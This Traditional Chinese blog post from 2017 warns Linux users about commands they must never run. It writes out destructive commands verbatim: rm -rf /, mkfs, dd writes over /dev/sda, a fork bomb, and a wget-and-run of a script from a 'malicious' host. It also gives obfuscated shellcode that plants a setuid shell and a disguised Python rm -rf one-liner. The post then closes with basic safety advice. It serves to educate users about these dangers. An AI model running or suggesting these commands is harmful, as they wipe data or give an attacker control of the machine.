千萬千萬不要執行的 Linux 命令

發表於2017-04-23

文中列出的命令絕對不可以執行,即使你覺得很好奇也不行,除非你是在虛擬機器上執行(出現問題你可以還原),因為它們會實實在在的破壞你的系統。所以不在root等高階管理許可權下執行命令是很好的習慣。

早晚有一天,Linux 系統會像 Windows 那樣流行,用的人越來越多,包括對計算機不是很瞭解的人,本文的目的就是告訴大家:在 Linux 給你最大程度自由度的同時,也使得破壞系統變得更加容易,如果你不瞭解某些命令的意義,下載執行包含惡意命令的指令碼,或者被騙執行某些命令,很容易讓你哭 都來不及。

這並不是說明 Linux 不安全,只是說明在不瞭解 Linux ,和很不小心的人面前,Linux 十分不安全。Windows 也好,Linux 也好,人本身才是最大的不安全因素。

下面的命令會刪除你硬碟上的檔案,rm 的 -r 遞迴刪除,和 -f 強制刪除是很危險的選項,即使日常操作,也會遇到誤刪檔案的情況。

sudo rm -rf / 刪除根分割槽全部的檔案
sudo rm -rf . 刪除當前目錄下的所有檔案
sudo rm -rf * 同上
rm -rf * or rm -rf *.* 同上
rm -rf ~ / & 刪除根分割槽和家目錄,即使你不是root,家目錄還是不能倖免。

同樣,如果你不知道 mkfs.xxxx (xxxx 可以是 vfat、ext2、ext3、bfs……) 是格式化命令的話,執行下面的命令會擦除你的硬碟分割槽:

sudo mkfs.xxxx

dd 是強大的 IO 輸入輸出定向工具,如果使用不當,破壞性很大,不僅僅是當前分割槽,當前系統,有的時候是整個硬碟。

sudo dd if=/dev/zero of=/dev/sda 全部硬碟清零。
sudo dd if=/dev/sda of=/dev/sdb 用第一塊硬碟的內容覆蓋第二塊的內容。
sudo dd if=something of=/dev/sda 往硬碟上寫垃圾資料。

同理,直接把命令結果定向到硬碟上,相當於往硬碟上寫垃圾資料:

any_command > /dev/sda 用隨意的資料破壞硬碟

上面的 sda 、sdb 也可能是其他類似的名稱。Linux 的 /dev 系統給操縱硬體提供了很方便和強大的功能,同時也使得破壞變得更容易。

fork 命令開啟一個子程式,如果把 fork 放在無限迴圈中,最終子程式會耗盡所有記憶體資源:

:(){:|:&};:

這段不知所云的符號,可以讓 Shell 不停的 fork 子程式,最後導致記憶體耗盡,不得不重啟,這不是 bug,只是 Shell 語句故意寫成簡寫的形式而已。下面的同理:

fork while fork

有的時候,壓縮包也是一個破壞來源~

有的壓縮包要求你解壓到某個系統中已經存在的目錄中,這時候你就要特別小心了,壓縮包裡面可能有成千上萬的小檔案,以各種檔名嘗試覆蓋你現有的檔案。

有的壓縮包看起來很小,但是解壓出來是上 GB 的垃圾資料,會充斥你的硬碟。

從不正規網站下載的程式、指令碼,同樣會有包含惡意命令的危險,不可隨便執行:

wget [url]http://some_place/some_file[/url]
sh ./some_file
wget [url]http://hax018r.org/malicious-script[/url]
sh ./malicious-script

載指令碼要確保來源正規,如果有能力,可以閱讀其程式碼。即使有原始碼的程式,也不要隨便編譯執行:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

上面看起來只是一堆沒有意義的 16 進位制資料,如果有人告訴你,執行這個程式你就可以不輸入密碼取得系統的 root 許可權,你可不要相信他,上面的程式實際執行的是“rm -rf ~ / & ”。

python 一類的指令碼語言,同樣可以拿來搞破壞:

python -c ‘import os; os.system(“”.join([chr(ord(i)-1) for i in “sn!.sg! “]))’

這段程式實際上會執行 rm -rf *,也許你很奇怪上面程式結尾的 “sn!.sg! ” 是什麼意思,實際上就是 rm -rf * 每個字母的下一個!

那麼我們如何避免執行惡意程式呢?

第一:不要用 root 作為日常使用的使用者,上面的程式,如果當前使用者不是 root,危害的波及範圍就會小很多。

第二:要知道哪些命令是幹什麼用的,不知道的命令不要冒然執行。執行有潛在破壞能力的程式,要小心檢查自己的輸入。

第三:要保證軟體、指令碼的來源正規。

最後一點,雖然比較消極,但是確實十分重要的一點:

經常備份你的資料!!

相關文章